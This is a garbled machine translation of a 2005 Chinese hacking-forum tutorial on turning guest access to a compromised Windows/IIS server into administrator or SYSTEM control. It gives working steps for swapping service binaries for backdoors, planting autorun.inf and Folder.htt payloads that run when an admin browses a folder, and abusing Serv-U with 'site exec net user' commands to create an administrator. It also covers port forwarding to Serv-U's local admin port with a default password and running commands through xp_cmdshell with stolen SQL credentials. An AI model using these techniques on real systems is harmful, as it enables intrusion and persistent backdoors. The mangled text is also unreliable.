Guest permissions break 8 law-vulnerability and early warning-the black bar safety net

ID MYHACK58:6220052519
Type myhack58
Reporter 佚名
Modified 2005-09-28T00:00:00


Guest privilege escalation method summary:

Now the invasion is more and more difficult, People's safety awareness have generally increased a lot, even the individual user to understand firewalls, antivirus software and to equipment in hand, for Microsoft's patch to upgrade also no longer is not interested. So now we want to on the Internet to scan weak passwords, the host has almost wishful thinking. This is a greatly good Ah.)

But it also makes us-made hack of theintrusion detectionreached an unprecedented difficulty. By all means, we usually can not directly get a system administrator privileges. For example, we adopted some of the IIS attack, and can only get IUSR-MACHINENAME privileges such as upload asp Trojan, as well as some of the overflow. This account is usually but the system default guest permissions, so, how to get to the system administrator or system privileges, it is becoming increasingly important.

So, I'll just sum it up a bit you can often use several elevated method, the following content is my sort of, there is nothing new in the method, write to and I like the rookie to see. The master who can be omitted, of course, you have to review I am not against, by the way help me to search what supplements and modifications:

1, social engineering.

For social engineering, I think we must not be unfamiliar, right? If you still don't understand this term, it is recommended that you go to to find some relevant information on check in. We are usually through a variety of methods to obtain the target's sensitive information, then be analyzed, which can be inferred the other admin password. To give an example: if we are through to the server for the database to guess the solution to give the admin the site password, and then take the uploaded a marine top Trojan, what do you do? First rummaging look at the asp file code to want to see to connect to the SQL account password? Wrong wrong wrong, we should first type a netstat –an command to see his opening of the port, of course with the net start command to view the service also. Once found, he opened a 3 3 8 9, and hesitate what? Whip out your terminal connector, add the other IP, type you on his website on the obtained user name and password...... After a few seconds, Oh, get in, right? This is because according to the social engineering principles, usually people in order to memory is convenient, will own in the multiple user name and password are the same. So, we get him on the site the administrator password, it is equivalent to get all his passwords. Including the system admin password. Thus we can take the sign of his 3 3 8 9 pull!

Even if he did not open 3 3 8 9 service, we also can rely on this password to hisFTP serveron the try, if hisFTP serveris serv-u 5.004 the following version, and the account also has write permissions, then we can overflow attack! This however can directly get system permissions. Use serv-u there are two elevated method, I'll will say.

It is not, we can also take it account to go to each website to try! Perhaps we can enter into his application of the mailbox get a lot of useful information! Can be used with our future actions.

There is an idea, we know that a site's network will usually be your homepage set to in IE after opening default home page to facilitate management. We can take advantage of this, his own home plant Internet page Trojan...... Then wait for him to open the IE...... Oh, how he did not think their home will bring their own kind of Trojan horse? In fact, the use of social engineering there are a variety of methods, want to qualified as a hack, this is must learn! More move your own brain, you will succeed!

2, the local overflow.

Microsoft is too cute, this sentence also don't know is which man to say, really not false, every now and then will bring us to some overflow vulnerabilities, we believe that through the recent MS-0 0 1 1 We must also earn a broiler? In fact, we got the Guest permissions of the shell after the same can use the overflow elevation. 最 常用 的 就是 RunAs.exe and winwmiex.exe or PipeUpAdmin and so on. Upload after the execution you can get Admin permissions. But the other is not a patched case, but the recent Microsoft vulnerabilities one by one, the local elevated privileges exploit will come out, so we want a lot of care about vulnerability information, perhaps the next exploit is that you write out the Oh!

3, The use of the scripts directory executable permission.

This is also we used to get the webshell after regular use of the trick, the principle is the scripts directory is IIS under the run directory, the permissions is what we dreamed of SYSTEM permissions. Common method of use is in the U vulnerability of the era we first upload the idq. dll to the IIS home directory under the scripts directory, and then use the ispc. exe to connect, you can get to system permissions, but this is in Microsoft out SP3 will not work, in fact we can still use this directory, as long as we upload another Trojan to the directory, I for example like Is winshell. We then in IE, enter:

http://targetIP/scripts/ 木马 文件 名 .exe

Wait a bit, see below the progress bar shows“complete”, you can, connect your set to the port! I here is the default 5 2 7 7, connect after the SYSTEM privileges! Then what are you doing here I. a...... Hey Hey

4, replace the system services.

It's a majority of black friends never tired of a trick. Because windows allows for the running of the program to make changes, so we can replace his services so that the system is restarted automatically after running our Backdoor, or Trojans! First, you get the guest permissions of the shell enter: net start command, to see him the running of the service. In this case if you're on a windows System Service familiar with, you can quickly see which services we can use.

C:\WINNT\System32\>net start Have to start the following Windows Services:

COM+ Event System Cryptographic Services DHCP Client Distributed Link Tracking Client DNS Client Event Log Help and Support IPSEC Services Logical Disk Manager Logical Disk Manager Administrative Servic Network Connections Network Location Awareness (NLA) Protected Storage Remote Procedure Call (RPC) Rising Process Communication Center Rising Realtime Monitor Service Secondary Logon Security Accounts Manager Shell Hardware Detection System Event Notification The System Restore Service Telephony Themes Upload Manager WebClient Windows Audio Windows Image Acquisition (WIA) Windows Management Instrumentation Windows Time Wireless Zero Configuration Workstation

The command completed successfully.

I'm on my machine run the following command to do a demonstration(we don't black me, and notice I use the red marked part is that I installed the Swiss Star. Rising Process Communication Center 服务 所 调用 的 是 CCenter.exe while Rising Realtime Monitor Service 服务 调用 的 是 RavMonD.exe the. These are third party services that can take advantage of. (Strongly recommended to replace the third-party services, and do not tamper with the system service, otherwise it will cause system instability so we search for these two files, found them in D:\ rising\rav\folder, then Note: If this file is on the system disk to the Program Files directory, we want to know, if the other party is using the NTFS format of the hard disk then the system disk under the folder guest permission is by default not writable, and Windows directory, Documents and Settings directory these are not writable, so can't we just replace the file, can only make the MOU route. This is also why I do not recommend to replace system services one of the reasons, because the system services file in the Windows\System32 directory, can not write, but if it is FAT32 format will not worry, due to it's deficiencies, all folders are writable.

So will someone will ask: if it is NTFS format do we no choice?

Of course not, the NTFS format by default in addition to those three folders is limited, the rest of the folders, partitions are everyone full control. That is I even is IPC$for anonymous connections, will be on of these places have writable permission to Run game! So once the other third-party services are not installed in those three folders, we can replace! I take the CCenter to start, first download it to local machine on to FTP, put to the IIS home directory then download and so on......) Then take out your file bundled with the machine, find the one you're most adept of the back door...... Oh, the bundle is good, upload, 先将对方的CCenter.exe文件改个名CCENTBAK.exe, and then replaced into their own CCenter it. Now just need the other side of the machine rebooted, our back door you can run! Due to the Windows instability of the system, the host in a week after it will restart, of course, if you can't wait, it can be on this serverDDOSattack forcing him to restart, but I don't endorse the game! At this time the Board your back door, that is, the System privileges!

5, replace the admin used the program.

If the other party does not you can use the service, you can also replace the other administrators of commonly used programs, such as QQ, MSN, etc., a specific replacement method with a replacement service of the same, but your back door when you can start to see you're out of luck.

6, The use of autorun . inf or desktop. ini.

We often encounter such a thing: the disc in the drive, it will automatically jump out to a section of the FLASH, why is this? Oh, you to the disc's root directory to see whether there is a autorun. inf file? With Notepad, open a look, is not there such a word: autorun=xxx.exe this is what you've just seen the auto-run program.

So we can use this to improve our privileges. The first configured a backdoor, I commonly used is winshell, of course, you don't have this line, upload to his D drive, under any one of the folder, and then from you that since the operation of the optical disc in the autorun. inf files are also uploaded, 不过上传前先将autorun=xxx.exe behind the xxx. exe instead you configure the backdoor file path, file name, and then uploaded to the d disk root directory, plus read-only, system, hidden attributes. OK will wait other admin to browse the D drive, our back door you can start! Of course, this must be in He did not prohibit the automatic running of the case.)

In addition the same effect is the desktop. ini. We all know windows support custom file, in fact it is through the folder written to a particular file--the desktop. ini with the Folder. htt to achieve that we can use to modify this file to achieve our purpose.

First of all, we are now the local establishment of a folder, the name is not important, enter it in the blank at the right point, select“custom folder”in xp seems to not work has been the lower point, the default can be. After completion, you will see in this directory two more named Folder setting file racks and desktop. ini file, if you can't see, first uncheck“Hide protectedoperating systemfile”then we are in the Folder setting directory to find the Folder. htt file, Notepad to open, at any place, add the following code:

<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”your Backdoor file name”> </OBJECT>

You will then be your Backdoor file placed in the Folder setting directory under this directory with the desktop. ini uploaded together to the other side any one directory, you can, as long as the other administrators to browse this directory, it performs up to our back door in! If you do not worry, you can set up several directories

7, the Serv-U elevation of Privilege

Use Serv-U elevation of Privilege there are three kinds of method, the overflow is the first, I've said it before, and is not presented here. I want to talk about is the rest of the two approaches.

Way one: requirements: Serv-u installation directory has full control.

Method: go to the other side of the Serv-U directory, to see his ServUDaemon. ini, this is the Serv-U configuration files, if the administrator does not select the serv - u all configuration write to the registry, we can from this file, see the Serv-U all the information, version, and IP, even username and password! Earlier versions of the password is not encrypted, but the later is the result of the MD5 encryption. So you can not directly get their password. But we still have a way to: first locally to install a Serv-U version the best New point, your own ServUDaemon. ini file from his download down the ServUDaemon. ini cover off, re-starting about Serv-U, so you all of the above configuration are with him of the same. We create a new user, what Group is not important, important is that his home directory was changed to the other side of the system tray, and then add the Execute permissions! This is the most important. Change after the application exits. Then you changed the ServUDaemon. ini file upload, overwrite his file, and his Serv-U restart to update the configuration, then we can login to his FTP. ENTER after executing the following command:

Cd windows Cd System32 Quote site exec net.exe user wofeiwo /add Quote site exec net.exe localgroup administrators wofeiwo /add Bye

And then you got a call wofeiwo the system administrator, so what? Landing 3 3 8 9, and you're done!

Approach II: Serv-u to open up two ports, one is 2 1, that is, FTP, and the other is 4 3 9 5 8, this port is doing? Hey, this is Serv-U the local management port. But the default is not allowed except 1 2 7. 0. 0. 1 outside of the IP connection, in which case we should use FPIPE. exe file, this is a port forwarding program, upload him, perform the command:

Fpipe –v –l 3 3 3 3 –r 4 3 9 5 8

Mean 4 4 4 4 port mapping to 4 3 9 5 8 port.

Then you can locally install a Serv-u, create a new server, IP fill in the other IP, the account for the LocalAdministrator password for the#1@$ak#. 1k;0@p connection on the rear you'll be able to manage his Serv-u, after the elevation of the method of the reference approach. I will not repeat them here.

8, the SQL account password is leaked.

If the other open a MSSQL Server, we can by using the SQL connector plus the administrator account, because MSSQL is the default SYSTEM permissions. Requirements: you got each other the MSSQL administrator password can be from his connection to the database the ASP file seen,the other did not delete the xp_cmdshell Methods: 使用Sqlexec.exe in the host field fill in the other IP, User and Pass filled in you get the user name and password. Format select xp_cmdshell”%s”can be. Then click connect, once connected it can be in the CMD column of the input you want to the CMD command.

Well...... Allow a stetch, good tired Ah, finally finished 8 method, to blow off steam...... The following omitted the N characters

In Summary, The above 8 kind of method is not absolute, the most important is your train of thought, each method in combination with each other, in order to play its due effect.